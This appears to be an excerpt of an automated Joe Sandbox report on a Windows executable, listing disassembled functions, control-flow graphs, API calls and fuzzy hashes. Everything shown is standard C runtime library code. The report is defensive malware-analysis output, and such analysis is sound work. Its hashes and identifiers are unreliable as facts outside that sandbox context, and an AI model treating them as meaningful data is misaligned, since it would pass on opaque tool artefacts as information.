                                                                                                                                                                                                                                                          • String ID: C:\Users\user\Desktop\96r3GgxntQ.exe$`%y
                                                                                                                                                                                                                                                          • API String ID: 2506810119-1517768399
                                                                                                                                                                                                                                                          • Opcode ID: 11f00a483e69a36e59491900033e86afabc287e74f7f19fedb5243a4477cde61
                                                                                                                                                                                                                                                          • Instruction ID: 26b7858245be0682efc0ccec26ea1be56d8ade127e30db9382419075bb3c384f
                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 11f00a483e69a36e59491900033e86afabc287e74f7f19fedb5243a4477cde61
                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 0E313275A00254AFDB21AB99DC81EFEBBFCEF85B10B5040A6F405A7211DBB18E45CB91
                                                                                                                                                                                                                                                          Function 00BB36FC Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 38libraryloaderCOMMONLIBRARYCODE
                                                                                                                                                                                                                                                          Download Yara Rule

                                                                                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                                                                                          • Executed
                                                                                                                                                                                                                                                          • Not Executed
                                                                                                                                                                                                                                                          control_flow_graph 443 bb36fc-bb3724 GetModuleHandleExW 444 bb3749-bb374d 443->444 445 bb3726-bb3739 GetProcAddress 443->445 448 bb3758-bb3765 call bb123a 444->448 449 bb374f-bb3752 FreeLibrary 444->449 446 bb373b-bb3746 445->446 447 bb3748 445->447 446->447 447->444 449->448
                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                          • GetModuleHandleExW.KERNEL32(00000000,mscoree.dll,00000000,?,?,?,00BB36AD,?,?,00BB364D,?,00BC02E0,0000000C,00BB37A4,?,00000002), ref: 00BB371C
                                                                                                                                                                                                                                                          • GetProcAddress.KERNEL32(00000000,CorExitProcess), ref: 00BB372F
                                                                                                                                                                                                                                                          • FreeLibrary.KERNEL32(00000000,?,?,?,00BB36AD,?,?,00BB364D,?,00BC02E0,0000000C,00BB37A4,?,00000002,00000000), ref: 00BB3752
                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.1554649372.0000000000BB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BB0000, based on PE: true
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1554631635.0000000000BB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1554665870.0000000000BBB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1554684885.0000000000BC1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1554701405.0000000000BC3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_bb0000_96r3GgxntQ.jbxd
                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                          • API ID: AddressFreeHandleLibraryModuleProc
                                                                                                                                                                                                                                                          • String ID: CorExitProcess$mscoree.dll
                                                                                                                                                                                                                                                          • API String ID: 4061214504-1276376045
                                                                                                                                                                                                                                                          • Opcode ID: c90e6103df2af52474ab0b6194728c68480e81dfcc5aad42a7d5acb673dbc786
                                                                                                                                                                                                                                                          • Instruction ID: 17949034d066b11b3fc6ba3d3d110168e7d4edacb72021a7c088001239a76fd1
                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: c90e6103df2af52474ab0b6194728c68480e81dfcc5aad42a7d5acb673dbc786
                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 88F03C71A00208BBCB11AB95DC59FFEBBF8EF08B52F4041A5E805A2160DFF49E44CA90
                                                                                                                                                                                                                                                          Function 00BB634D Relevance: 7.6, APIs: 5, Instructions: 110COMMON
                                                                                                                                                                                                                                                          Download Yara Rule

                                                                                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                                                                                          • Executed
                                                                                                                                                                                                                                                          • Not Executed
                                                                                                                                                                                                                                                          control_flow_graph 453 bb634d-bb6372 call bb3f72 456 bb637f-bb63a5 MultiByteToWideChar 453->456 457 bb6374-bb637c 453->457 458 bb63ab-bb63b7 456->458 459 bb6444-bb6448 456->459 457->456 460 bb63b9-bb63ca 458->460 461 bb6403 458->461 462 bb644a-bb644d 459->462 463 bb6454-bb6469 call bb123a 459->463 464 bb63cc-bb63db call bbac20 460->464 465 bb63e5-bb63eb 460->465 467 bb6405-bb6407 461->467 462->463 472 bb643d-bb6443 call bb646a 464->472 478 bb63dd-bb63e3 464->478 469 bb63ec call bb62ff 465->469 471 bb6409-bb642b call bb20b0 MultiByteToWideChar 467->471 467->472 475 bb63f1-bb63f6 469->475 471->472 482 bb642d-bb643b GetStringTypeW 471->482 472->459 475->472 479 bb63f8 475->479 481 bb63fe-bb6401 478->481 479->481 481->467 482->472
                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                          • MultiByteToWideChar.KERNEL32(00000000,00000000,00000100,00000020,00000000,00000000,5EFC4D8B,00000100,00BB54C8,00000000,00000001,00000020,00000100,?,5EFC4D8B,00000000), ref: 00BB639A
                                                                                                                                                                                                                                                          • __alloca_probe_16.LIBCMT ref: 00BB63D2
                                                                                                                                                                                                                                                          • MultiByteToWideChar.KERNEL32(?,00000001,?,?,00000000,?), ref: 00BB6423
                                                                                                                                                                                                                                                          • GetStringTypeW.KERNEL32(?,00000000,00000000,?), ref: 00BB6435
                                                                                                                                                                                                                                                          • __freea.LIBCMT ref: 00BB643E
                                                                                                                                                                                                                                                            • Part of subcall function 00BB62FF: HeapAlloc.KERNEL32(00000000,?,00000004,?,00BB7E5B,?,00000000,?,00BB686F,?,00000004,00000000,?,?,?,00BB3BCD), ref: 00BB6331
                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.1554649372.0000000000BB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BB0000, based on PE: true
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1554631635.0000000000BB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1554665870.0000000000BBB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1554684885.0000000000BC1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1554701405.0000000000BC3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_bb0000_96r3GgxntQ.jbxd
                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                          • API ID: ByteCharMultiWide$AllocHeapStringType__alloca_probe_16__freea
                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                          • API String ID: 1857427562-0
                                                                                                                                                                                                                                                          • Opcode ID: 07ed6b8a0455e1ae82e37091b393426d6d997a56e060a1113f710ceb0c6bac24
                                                                                                                                                                                                                                                          • Instruction ID: 7ef7d413acbe1a1d03a5043ffa2d43075c5ab3aa504dbd2b6aa94dae66bd904c
                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 07ed6b8a0455e1ae82e37091b393426d6d997a56e060a1113f710ceb0c6bac24
                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: E531AD72A0061AABDB259F68DC85DFE7BE5EB00710B0441A8FC14D7250EBB9CD55CBA0
                                                                                                                                                                                                                                                          Function 00BB561E Relevance: 7.6, APIs: 5, Instructions: 68COMMON
                                                                                                                                                                                                                                                          Download Yara Rule

                                                                                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                                                                                          • Executed
                                                                                                                                                                                                                                                          • Not Executed
                                                                                                                                                                                                                                                          control_flow_graph 483 bb561e-bb5633 GetEnvironmentStringsW 484 bb568b 483->484 485 bb5635-bb5655 call bb55e7 WideCharToMultiByte 483->485 487 bb568d-bb568f 484->487 485->484 491 bb5657 485->491 489 bb5698-bb56a0 487->489 490 bb5691-bb5692 FreeEnvironmentStringsW 487->490 490->489 492 bb5658 call bb62ff 491->492 493 bb565d-bb5662 492->493 494 bb5680 493->494 495 bb5664-bb5678 WideCharToMultiByte 493->495 497 bb5682-bb5689 call bb4869 494->497 495->494 496 bb567a-bb567e 495->496 496->497 497->487
                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                          • GetEnvironmentStringsW.KERNEL32 ref: 00BB5627
                                                                                                                                                                                                                                                          • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 00BB564A
                                                                                                                                                                                                                                                            • Part of subcall function 00BB62FF: HeapAlloc.KERNEL32(00000000,?,00000004,?,00BB7E5B,?,00000000,?,00BB686F,?,00000004,00000000,?,?,?,00BB3BCD), ref: 00BB6331
                                                                                                                                                                                                                                                          • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,00000000,?,00000000,00000000), ref: 00BB5670
                                                                                                                                                                                                                                                          • _free.LIBCMT ref: 00BB5683
                                                                                                                                                                                                                                                          • FreeEnvironmentStringsW.KERNEL32(00000000), ref: 00BB5692
                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.1554649372.0000000000BB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BB0000, based on PE: true
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1554631635.0000000000BB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1554665870.0000000000BBB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1554684885.0000000000BC1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1554701405.0000000000BC3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_bb0000_96r3GgxntQ.jbxd
                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                          • API ID: ByteCharEnvironmentMultiStringsWide$AllocFreeHeap_free
                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                          • API String ID: 2278895681-0
                                                                                                                                                                                                                                                          • Opcode ID: 1cdb0477fdbe6327570e5d0283b005b68da2d3afb785e997bf9530c68f623113
                                                                                                                                                                                                                                                          • Instruction ID: 848bc1813e80ab3d59f7dcf68eca8fbc837b017974f47a1dc21646139fc313f3
                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 1cdb0477fdbe6327570e5d0283b005b68da2d3afb785e997bf9530c68f623113
                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: B301AC72601A557F27311A765C8DEFB6BADDEC6B61355026AF905D3140EFE08C0181B1
                                                                                                                                                                                                                                                          Function 00BB44A8 Relevance: 7.6, APIs: 5, Instructions: 53COMMONLIBRARYCODE
                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                          • GetLastError.KERNEL32(?,?,?,00BB47FE,00BB7E79,?,00BB686F,?,00000004,00000000,?,?,?,00BB3BCD,?,00000000), ref: 00BB44AD
                                                                                                                                                                                                                                                          • _free.LIBCMT ref: 00BB44E2
                                                                                                                                                                                                                                                          • _free.LIBCMT ref: 00BB4509
                                                                                                                                                                                                                                                          • SetLastError.KERNEL32(00000000,?,?,?,?,?,?), ref: 00BB4516
                                                                                                                                                                                                                                                          • SetLastError.KERNEL32(00000000,?,?,?,?,?,?), ref: 00BB451F
                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.1554649372.0000000000BB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BB0000, based on PE: true
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1554631635.0000000000BB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1554665870.0000000000BBB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1554684885.0000000000BC1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1554701405.0000000000BC3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_bb0000_96r3GgxntQ.jbxd
                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                          • API ID: ErrorLast$_free
                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                          • API String ID: 3170660625-0
                                                                                                                                                                                                                                                          • Opcode ID: 102d0be885169d26a98c300dd752183f67d4acebb7dd3a10b0993b5badb46bd8
                                                                                                                                                                                                                                                          • Instruction ID: b02858e9d49aa1a1b286b0757108acf5fa21720950b6dd6d9c9f3394bb919e2f
                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 102d0be885169d26a98c300dd752183f67d4acebb7dd3a10b0993b5badb46bd8
                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 6B01D136200A40AB82227B356C89FBB22EEFBD677172401A5F529A3293EFF0C9014021
                                                                                                                                                                                                                                                          Function 00BB6176 Relevance: 7.5, APIs: 5, Instructions: 40COMMONLIBRARYCODE
                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                          • _free.LIBCMT ref: 00BB618E
                                                                                                                                                                                                                                                            • Part of subcall function 00BB4869: HeapFree.KERNEL32(00000000,00000000,?,00BB620D,?,00000000,?,00000000,?,00BB6234,?,00000007,?,?,00BB669F,?), ref: 00BB487F
                                                                                                                                                                                                                                                            • Part of subcall function 00BB4869: GetLastError.KERNEL32(?,?,00BB620D,?,00000000,?,00000000,?,00BB6234,?,00000007,?,?,00BB669F,?,?), ref: 00BB4891
                                                                                                                                                                                                                                                          • _free.LIBCMT ref: 00BB61A0
                                                                                                                                                                                                                                                          • _free.LIBCMT ref: 00BB61B2
                                                                                                                                                                                                                                                          • _free.LIBCMT ref: 00BB61C4
                                                                                                                                                                                                                                                          • _free.LIBCMT ref: 00BB61D6
                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.1554649372.0000000000BB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BB0000, based on PE: true
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1554631635.0000000000BB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1554665870.0000000000BBB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1554684885.0000000000BC1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1554701405.0000000000BC3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_bb0000_96r3GgxntQ.jbxd
                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                          • API ID: _free$ErrorFreeHeapLast
                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                          • API String ID: 776569668-0
                                                                                                                                                                                                                                                          • Opcode ID: 48f798f025fc0ac3d318fc6b90b447edadb2f417c1aecbbb9216e5558472e20f
                                                                                                                                                                                                                                                          • Instruction ID: 4b510ad01b7658882b6a894c0686b1da70f6f6ac8c491bd0fcc0f96d3410370f
                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 48f798f025fc0ac3d318fc6b90b447edadb2f417c1aecbbb9216e5558472e20f
                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 27F06232604200AF8660EF5DF981CBA77EDFA45B107581CA5F449F7593CBB4FC808690
                                                                                                                                                                                                                                                          Function 00BB512A Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 91COMMON
                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                            • Part of subcall function 00BB4424: GetLastError.KERNEL32(00000008,?,00BB6D69,?,?,?,00BC04C8,0000002C,00BB3F34,00000016,00BB209F,00BB1AFC), ref: 00BB4428
                                                                                                                                                                                                                                                            • Part of subcall function 00BB4424: _free.LIBCMT ref: 00BB445B
                                                                                                                                                                                                                                                            • Part of subcall function 00BB4424: SetLastError.KERNEL32(00000000), ref: 00BB449C
                                                                                                                                                                                                                                                            • Part of subcall function 00BB4424: _abort.LIBCMT ref: 00BB44A2
                                                                                                                                                                                                                                                            • Part of subcall function 00BB5249: _abort.LIBCMT ref: 00BB527B
                                                                                                                                                                                                                                                            • Part of subcall function 00BB5249: _free.LIBCMT ref: 00BB52AF
                                                                                                                                                                                                                                                            • Part of subcall function 00BB4EBE: GetOEMCP.KERNEL32(00000000,?,?,00BB5147,?), ref: 00BB4EE9
                                                                                                                                                                                                                                                          • _free.LIBCMT ref: 00BB51A2
                                                                                                                                                                                                                                                          • _free.LIBCMT ref: 00BB51D8
                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.1554649372.0000000000BB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BB0000, based on PE: true
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1554631635.0000000000BB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1554665870.0000000000BBB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1554684885.0000000000BC1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1554701405.0000000000BC3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_bb0000_96r3GgxntQ.jbxd
                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                          • API ID: _free$ErrorLast_abort
                                                                                                                                                                                                                                                          • String ID: (?z$(?z
                                                                                                                                                                                                                                                          • API String ID: 2991157371-3597695164
                                                                                                                                                                                                                                                          • Opcode ID: 1d9284a03e1bd6e3495780cb59976444354d1a79227a966d0caa4557f601baa8
                                                                                                                                                                                                                                                          • Instruction ID: 85dda8aa85e5f357ca16aaf9c9e6f4396c50ed05644c0e15a8737ac9accfb3ec
                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 1d9284a03e1bd6e3495780cb59976444354d1a79227a966d0caa4557f601baa8
                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 6431D131A00648AFDB21EBADD840BFDB7F5EF45320F2101E9E814AB292DBB19D41CB41
                                                                                                                                                                                                                                                          Function 00BB25E3 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 27libraryCOMMONLIBRARYCODE
                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                          • LoadLibraryExW.KERNEL32(00000000,00000000,00000800,?,00BB2594,00000000,?,00BC1B50,?,?,?,00BB2737,00000004,InitializeCriticalSectionEx,00BBBC48,InitializeCriticalSectionEx), ref: 00BB25F0
                                                                                                                                                                                                                                                          • GetLastError.KERNEL32(?,00BB2594,00000000,?,00BC1B50,?,?,?,00BB2737,00000004,InitializeCriticalSectionEx,00BBBC48,InitializeCriticalSectionEx,00000000,?,00BB24C7), ref: 00BB25FA
                                                                                                                                                                                                                                                          • LoadLibraryExW.KERNEL32(00000000,00000000,00000000), ref: 00BB2622
                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.1554649372.0000000000BB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BB0000, based on PE: true
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1554631635.0000000000BB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1554665870.0000000000BBB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1554684885.0000000000BC1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1554701405.0000000000BC3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_bb0000_96r3GgxntQ.jbxd
                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                          • API ID: LibraryLoad$ErrorLast
                                                                                                                                                                                                                                                          • String ID: api-ms-
                                                                                                                                                                                                                                                          • API String ID: 3177248105-2084034818
                                                                                                                                                                                                                                                          • Opcode ID: 238b0ce9a6aa746b1bd0e5b0612f7f86b8f0ba90063a034004a915500267c824
                                                                                                                                                                                                                                                          • Instruction ID: 09f7168d81e9a161deba27726b109f08120d5ccc9fc30c1e3ffd18b5fbd96e52
                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 238b0ce9a6aa746b1bd0e5b0612f7f86b8f0ba90063a034004a915500267c824
                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 8AE04F30684304BBEF212B61EC06FFA3F98EB10B51F504460F90EE80E1EBF1E9549A44
                                                                                                                                                                                                                                                          Function 00BB57DD Relevance: 6.1, APIs: 4, Instructions: 52libraryCOMMONLIBRARYCODE
                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                          • LoadLibraryExW.KERNEL32(00000000,00000000,00000800,00000000,00000000,00000000,?,00BB5784,00000000,00000000,00000000,00000000,?,00BB5981,00000006,FlsSetValue), ref: 00BB580F
                                                                                                                                                                                                                                                          • GetLastError.KERNEL32(?,00BB5784,00000000,00000000,00000000,00000000,?,00BB5981,00000006,FlsSetValue,00BBC4D8,FlsSetValue,00000000,00000364,?,00BB44F6), ref: 00BB581B
                                                                                                                                                                                                                                                          • LoadLibraryExW.KERNEL32(00000000,00000000,00000000,?,00BB5784,00000000,00000000,00000000,00000000,?,00BB5981,00000006,FlsSetValue,00BBC4D8,FlsSetValue,00000000), ref: 00BB5829
                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.1554649372.0000000000BB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BB0000, based on PE: true
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1554631635.0000000000BB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1554665870.0000000000BBB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1554684885.0000000000BC1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1554701405.0000000000BC3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_bb0000_96r3GgxntQ.jbxd
                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                          • API ID: LibraryLoad$ErrorLast
                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                          • API String ID: 3177248105-0
                                                                                                                                                                                                                                                          • Opcode ID: c5cdd05f46d2544fea0048b06e1ca686d92e0203c6ddd56504639fef4b10c35d
                                                                                                                                                                                                                                                          • Instruction ID: d0944dd6a2a0d47c8136ee5f82e03c9ef17792dcc12e9958297fcdc5be0c57d5
                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: c5cdd05f46d2544fea0048b06e1ca686d92e0203c6ddd56504639fef4b10c35d
                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 3C018F32605A22ABC7315A69EC84FB77BD8EF05BA1B600664F91AD7140DFE0D800C6E1
                                                                                                                                                                                                                                                          Function 00BB48BB Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 168COMMON
                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                          • _free.LIBCMT ref: 00BB4A27
                                                                                                                                                                                                                                                            • Part of subcall function 00BB474D: IsProcessorFeaturePresent.KERNEL32(00000017,00BB473C,00000000,?,00000004,00000000,?,?,?,?,00BB4749,00000000,00000000,00000000,00000000,00000000), ref: 00BB474F
                                                                                                                                                                                                                                                            • Part of subcall function 00BB474D: GetCurrentProcess.KERNEL32(C0000417), ref: 00BB4771
                                                                                                                                                                                                                                                            • Part of subcall function 00BB474D: TerminateProcess.KERNEL32(00000000), ref: 00BB4778
                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.1554649372.0000000000BB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BB0000, based on PE: true
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1554631635.0000000000BB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1554665870.0000000000BBB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1554684885.0000000000BC1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1554701405.0000000000BC3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_bb0000_96r3GgxntQ.jbxd
                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                          • API ID: Process$CurrentFeaturePresentProcessorTerminate_free
                                                                                                                                                                                                                                                          • String ID: *?$.
                                                                                                                                                                                                                                                          • API String ID: 2667617558-3972193922
                                                                                                                                                                                                                                                          • Opcode ID: b5ebe54ac363d96a5ffd237f2e5e25fa63b2e5d383b99c3f0f4b770ea8c32303
                                                                                                                                                                                                                                                          • Instruction ID: 8745645be4033c79791a47720aec1a136f64373c6f158a80951d6ec184ef6bbc
                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: b5ebe54ac363d96a5ffd237f2e5e25fa63b2e5d383b99c3f0f4b770ea8c32303
                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 0E514D75E00219AFDB14DFA9C881AFEBBF5FF58314F2441A9E454A7342E7B19A018B50
                                                                                                                                                                                                                                                          Function 00BB5249 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 45COMMONLIBRARYCODE
                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                            • Part of subcall function 00BB4424: GetLastError.KERNEL32(00000008,?,00BB6D69,?,?,?,00BC04C8,0000002C,00BB3F34,00000016,00BB209F,00BB1AFC), ref: 00BB4428
                                                                                                                                                                                                                                                            • Part of subcall function 00BB4424: _free.LIBCMT ref: 00BB445B
                                                                                                                                                                                                                                                            • Part of subcall function 00BB4424: SetLastError.KERNEL32(00000000), ref: 00BB449C
                                                                                                                                                                                                                                                            • Part of subcall function 00BB4424: _abort.LIBCMT ref: 00BB44A2
                                                                                                                                                                                                                                                          • _abort.LIBCMT ref: 00BB527B
                                                                                                                                                                                                                                                          • _free.LIBCMT ref: 00BB52AF
                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.1554649372.0000000000BB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BB0000, based on PE: true
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1554631635.0000000000BB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1554665870.0000000000BBB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1554684885.0000000000BC1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1554701405.0000000000BC3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_bb0000_96r3GgxntQ.jbxd
                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                          • API ID: ErrorLast_abort_free
                                                                                                                                                                                                                                                          • String ID: (?z
                                                                                                                                                                                                                                                          • API String ID: 289325740-554794068
                                                                                                                                                                                                                                                          • Opcode ID: 06972be4f5f6f8307b187193715a92f25602e69ad679fb0999c4f22a34735e94
                                                                                                                                                                                                                                                          • Instruction ID: 12abbc4a5b54bb7d18b870f59f7371308c3bb54edc6815b71f6e51a19d6f30e2
                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 06972be4f5f6f8307b187193715a92f25602e69ad679fb0999c4f22a34735e94
